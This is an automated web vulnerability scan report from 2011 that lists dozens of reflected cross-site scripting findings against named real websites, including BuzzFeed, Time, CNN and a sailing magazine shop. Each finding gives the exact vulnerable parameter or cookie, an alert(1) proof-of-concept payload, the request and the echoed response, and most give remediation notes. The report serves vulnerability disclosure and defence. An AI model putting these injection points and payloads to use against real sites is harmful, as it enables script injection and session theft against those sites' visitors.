This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /26813/3c003b8f05f4a40792d0446420f9ef23?callback=BF_PARTNER.gate_response5b016<script>alert(1)</script>74d967ff502&cb=8389 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Wed, 12 Oct 2011 14:34:39 GMT
Date: Wed, 05 Oct 2011 14:34:39 GMT
Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f1997<script>alert(1)</script>b478c7f3189 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /26813/570b5c03d148b327600c7b21c4de1c70?callback=BF_PARTNER.gate_responsef1997<script>alert(1)</script>b478c7f3189&cb=7079 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Wed, 12 Oct 2011 14:35:05 GMT
Date: Wed, 05 Oct 2011 14:35:05 GMT
Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f37d4<script>alert(1)</script>a4baf090e45 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /26813/62f6407fe047d99a744b85355711cfdc?callback=BF_PARTNER.gate_responsef37d4<script>alert(1)</script>a4baf090e45&cb=1345 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604744
Expires: Wed, 12 Oct 2011 14:40:42 GMT
Date: Wed, 05 Oct 2011 14:41:38 GMT
Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e355a<script>alert(1)</script>e68bb0f9f19 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /26813/663fb9f3b96e903356d0d2dedf5d432c?callback=BF_PARTNER.gate_responsee355a<script>alert(1)</script>e68bb0f9f19&cb=8232 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Wed, 12 Oct 2011 14:35:56 GMT
Date: Wed, 05 Oct 2011 14:35:56 GMT
Connection: close
2.36. http://search.time.com/results.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://search.time.com
Path: /results.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f6955'><script>alert(1)</script>00dde427740 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:23:21 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=utf-8
Content-Length: 84981
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
2.37. http://search.time.com/results.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://search.time.com
Path: /results.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbb0f"><script>alert(1)</script>57c022970d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:23:20 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=utf-8
Content-Length: 84411
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload f9eaa<img%20src%3da%20onerror%3dalert(1)>195e54f8b9f was submitted in the query parameter. This input was echoed as f9eaa<img src=a onerror=alert(1)>195e54f8b9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the sortBy request parameter is copied into the HTML document as plain text between tags. The payload 64c3a<img%20src%3da%20onerror%3dalert(1)>7321e626e1b was submitted in the sortBy parameter. This input was echoed as 64c3a<img src=a onerror=alert(1)>7321e626e1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the domains request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5fd9'%3balert(1)//0383e943871 was submitted in the domains parameter. This input was echoed as c5fd9';alert(1)//0383e943871 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:41:49 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=1200
Expires: Wed, 05 Oct 2011 15:01:49 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 7424
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head>
<script type="text/javascript">
var cnnDocDomain = '';
var docDomains = 'cnn.com|turner.comc5fd9';alert(1)//0383e943871'.split('|');
for (var idx = 0; idx < docDomains.length; idx++) {
    var d = docDomains[idx];
    if (location.hostname.indexOf(d) > ...[SNIP]...
The value of the text request parameter is copied into the HTML document as plain text between tags. The payload 3469b<img%20src%3da%20onerror%3dalert(1)>8cf45b531c2 was submitted in the text parameter. This input was echoed as 3469b<img src=a onerror=alert(1)>8cf45b531c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:41:39 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=1200
Expires: Wed, 05 Oct 2011 15:01:39 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 7502
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head>
<script type="text/javascript"> var cnnDocDomain = ''; var docDomains = 'cnn.com|turner.com'.spli ...[SNIP]... <textarea id="jsCode">
{"criteria":[{"target":"web","startAt":"1","maxResults":"10","sortBy":"","order":"","sites":[""],"queries":["xss interest bond mortgage3469b<img src=a onerror=alert(1)>8cf45b531c2"]}],"metaResults":{"web":"0"},"results":[[]],"islCriteria":{"target":"isl","startAt":"1","maxResults":"11","sortBy":"","order":"","sites":[""],"queries":["xss interest bond mortgage3469b<img src=a one ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68883"-alert(1)-"df45a6c10a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the at request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ace7"-alert(1)-"6bf94e7fc81 was submitted in the at parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ci request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc245"-alert(1)-"cde73d3e2c6 was submitted in the ci parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57984"-alert(1)-"01885e6ef6d was submitted in the cr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ep request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ab52"-alert(1)-"a078b9c7116 was submitted in the ep parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.47. http://secure-us.imrworldwide.com/cgi-bin/m [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://secure-us.imrworldwide.com
Path: /cgi-bin/m
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f04ee"-alert(1)-"8bfa4e88a8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55e95"-alert(1)-"f9fffea9ba2 was submitted in the pr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee309"-alert(1)-"5aff949030a was submitted in the r parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the rt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2b00"-alert(1)-"afea0a3e879 was submitted in the rt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the st request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa094"-alert(1)-"ed6badb8a77 was submitted in the st parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the MSRSMAG request parameter is copied into an HTML comment. The payload 33afd-->2154f556183 was submitted in the MSRSMAG parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the MSRSMAG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b18c2'%3b9cc60c9ea13 was submitted in the MSRSMAG parameter. This input was echoed as b18c2';9cc60c9ea13 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload bfe78<script>alert(1)</script>566f067ef66 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:33:13 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Content-Length: 1288
Content-Type: text/json
YUI.Env.JSONP.yui_3_3_0_7_1317825045655135bfe78<script>alert(1)</script>566f067ef66({"conditions":{"meta":{"desc":"Conditions RESTFul service READ call via JSON","version":"2.1.0","input-zip":"20001","input-city":"Washington","input-state":"DC","response-code":100,"response":"The con ...[SNIP]...
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 11546<script>alert(1)</script>83632e3a6ca was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload fd44d<script>alert(1)</script>286805e1ef was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the pos request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ab5f1%3balert(1)//eef80b142d7 was submitted in the pos parameter. This input was echoed as ab5f1;alert(1)//eef80b142d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7894"><script>alert(1)</script>14d23470de1 was submitted in the size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the size request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9498"%3balert(1)//122e120ff8e was submitted in the size parameter. This input was echoed as f9498";alert(1)//122e120ff8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the tileCounter request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6278c%3balert(1)//196b60afd15 was submitted in the tileCounter parameter. This input was echoed as 6278c;alert(1)//196b60afd15 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Expires: Wed, 05 Oct 2011 15:03:03 GMT
ntCoent-Length: 3245
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 3245
Date: Wed, 05 Oct 2011 14:52:35 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title></tit ...[SNIP]...
<script type="text/javascript">
var adConfig = new TiiAdConfig("3475.life");
adConfig.setCmSitename("cm.life");
adConfig.setRevSciTracking(true);
var adFactory = null;
var tileCounter = 16278c;alert(1)//196b60afd15;
var inDapIF=true;
if (parent && parent.adFactory) {
    var parentAd = parent.adFactory;
    // instantiate new adFactory object, based on parent adFactory object
    var ...[SNIP]...
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 38e7b<img%20src%3da%20onerror%3dalert(1)>ccc87e92bc4 was submitted in the url parameter. This input was echoed as 38e7b<img src=a onerror=alert(1)>ccc87e92bc4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
2.62. http://www.seahorse.co.uk/shop/products/back_issues.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.seahorse.co.uk
Path: /shop/products/back_issues.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2c155<script>alert(1)</script>aa38bc80652 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:20:54 GMT
Server: Apache/1.3.33 (Unix) mod_throttle/3.1.2 PHP/4.4.4 with Suhosin-Patch FrontPage/5.0.2.2623 mod_ssl/2.8.22 OpenSSL/0.9.7d
X-Powered-By: PHP/4.4.4
Content-Type: text/html
Content-Length: 3410
<!-- header starts here --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Seahorse International Sailing Magazine</title>
The value of the year request parameter is copied into the HTML document as plain text between tags. The payload 98d3c<script>alert(1)</script>c627511222f was submitted in the year parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:20:48 GMT
Server: Apache/1.3.33 (Unix) mod_throttle/3.1.2 PHP/4.4.4 with Suhosin-Patch FrontPage/5.0.2.2623 mod_ssl/2.8.22 OpenSSL/0.9.7d
X-Powered-By: PHP/4.4.4
Content-Type: text/html
Content-Length: 3409
<!-- header starts here --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Seahorse International Sailing Magazine</title>
The value of the new request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f2f1"><script>alert(1)</script>9c9cf0df856 was submitted in the new parameter. This input was echoed as 1f2f1\"><script>alert(1)</script>9c9cf0df856 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!-- header starts here --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Seahorse International Sailing Magazine</title>
...[SNIP]... <input type = text class='formBox' name = "B921f2f1\"><script>alert(1)</script>9c9cf0df856" value = 1 size = 3> ...[SNIP]...
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload b9e8f<script>alert(1)</script>048c06dc6d0 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the UIDR cookie is copied into the HTML document as plain text between tags. The payload 9f087<script>alert(1)</script>ea56a26f3e5 was submitted in the UIDR cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p108883753 cookie is copied into the HTML document as plain text between tags. The payload 8eded<script>alert(1)</script>f05db26a88e was submitted in the ar_p108883753 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p109848095 cookie is copied into the HTML document as plain text between tags. The payload c33b5<script>alert(1)</script>285285dc290 was submitted in the ar_p109848095 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p110620504 cookie is copied into the HTML document as plain text between tags. The payload 3de2f<script>alert(1)</script>b7b6a60bca was submitted in the ar_p110620504 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p117672109 cookie is copied into the HTML document as plain text between tags. The payload ea45f<script>alert(1)</script>1f48ac03819 was submitted in the ar_p117672109 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p119936314 cookie is copied into the HTML document as plain text between tags. The payload 96a74<script>alert(1)</script>9da2ecf03fe was submitted in the ar_p119936314 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p120927104 cookie is copied into the HTML document as plain text between tags. The payload f8340<script>alert(1)</script>0b39a60673d was submitted in the ar_p120927104 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p63514475 cookie is copied into the HTML document as plain text between tags. The payload ba097<script>alert(1)</script>15820b863ab was submitted in the ar_p63514475 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload cc7b2<script>alert(1)</script>a2719cdcbe9 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload a288b<script>alert(1)</script>a416727e360 was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload f125c<script>alert(1)</script>7f96a50e532 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the vaguid cookie is copied into the HTML document as plain text between tags. The payload 7f117<script>alert(1)</script>b894dfbbedb was submitted in the vaguid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the MSRSMAG request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b831"><img%20src%3da%20onerror%3dalert(1)>ecdb6b6b8bb was submitted in the MSRSMAG parameter. This input was echoed as 8b831"><img src=a onerror=alert(1)>ecdb6b6b8bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /servlet/Show?WESPAGE=am/Services/load_email.jsp&MSRSMAG=TD8b831"><img%20src%3da%20onerror%3dalert(1)>ecdb6b6b8bb HTTP/1.1
Host: secure.customersvc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://subscription.timeinc.com/storefront/privacy/time/generic_privacy_new.html?dnp-source=E
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
IMW0253E <HTML><HEAD><TITLE>Redirection</TITLE></HEAD><BODY>This document can be found <A HREF="http://secure.customersvc.com/servlet/Show?WESPAGE=am/home.jsp&MSRSMAG=TD8B831"><IMG SRC=A ONERROR=ALERT(1)>ECDB6B6B8BB"> ...[SNIP]...
Report generated by XSS.CX at Wed Oct 05 10:00:13 CDT 2011.